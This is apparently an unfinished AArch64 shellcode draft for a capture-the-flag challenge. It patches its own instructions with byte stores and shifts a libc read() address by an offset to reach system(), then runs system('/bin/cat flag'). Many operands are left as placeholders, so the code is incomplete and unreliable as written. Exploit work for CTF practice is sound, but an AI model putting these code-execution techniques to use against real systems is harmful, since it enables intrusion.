/* not finished yet */

0:  .inst 0x32207a7d /* orr w29, w11, #0x3fff */

/* prepare */
4:  adds
8:  subs
c:  adds
10: adds
14: adds

/* prepare add x0 = "/bin/cat flag" */
/* instruction */
18: subs w25, w??, #???? /* w25 = 0x8c */
1c: subs w9, w??, #???? /* w9 = 0x91 */
20: strb w9, [x1, x25]
24: subs w25, w??, #???? /* w25 = 0x8b */
28: strb w26, [x1, x25]
2c: subs w25, w??, #???? /* w25 = 0x88 */
30: strb w26, [x1, x25]
/* data */ /* string null byte */
34: subs w25, w??, #???? /* w25 = 0xa9 */
38: strb w26, [x1, x25]

/* prepare x25 = 0x00083458 */
/* instruction */
3c: subs w25, w??, #???? /* w25 = 0x8f */
40: subs w9, w??, #???? /* w9 = 0xb9 */
44: strb w9, [x1, x25]
/* data */
48: subs w25, w??, #???? /* w25 = 0x9b */
4c: strb w26, [x1, x25]
50: subs w25, w??, #???? /* w25 = 0x9a */
54: subs w9, w??, #???? /* w9 = 0x08 */
58: strb w9, [x1, x25]

/* prepare x17 -= x25 */
5c: subs w25, w??, #???? /* w25 = 0x93 */
60: subs w9, w??, #???? /* w9 = 0xcb */
64: strb w9, [x1, x25]
68: subs w25, w??, #???? /* w25 = 0x92 */
6c: subs w9, w??, #???? /* w9 = 0x19 */
70: strb w9, [x1, x25]
74: subs w25, w??, #???? /* w25 = 0x91 */
78: subs w9, w??, #???? /* w9 = 0x02 */
7c: strb w9, [x1, x25]

80:  .inst 0x32207a7d /* orr w29, w11, #0x3fff */
84: cbnz w26, 0x40404 /* branch instruction for i-cache flushing */

/* x0 = "/bin/cat flag" */
88: .inst 0x41416041 /* (91006000) add x0, x0, #0x18 */

/* x17 is the libc address of read() */
/* we are going to make x17 the address of system() */
8c: .inst 0x41404839 /* (b9409039) ldr w25, [x1, #0x90] */ /* x25 = 0x00083458 */
90: .inst 0x41414131 /* (cb190231) sub x17, x17, x25 */ /* x17 = addr of system() */

/* system("/bin/cat flag") */
94: br x17

98: .inst 0x20203458 /* will be modified to 0x00083458 */

9c: .inst 0x6e69622f /* "/bin" */
a0: .inst 0x7461632f /* "/cat" */
a4: .inst 0x616c6620 /* " fla" */
a8: .inst 0x41414167 /* "gAAA" */

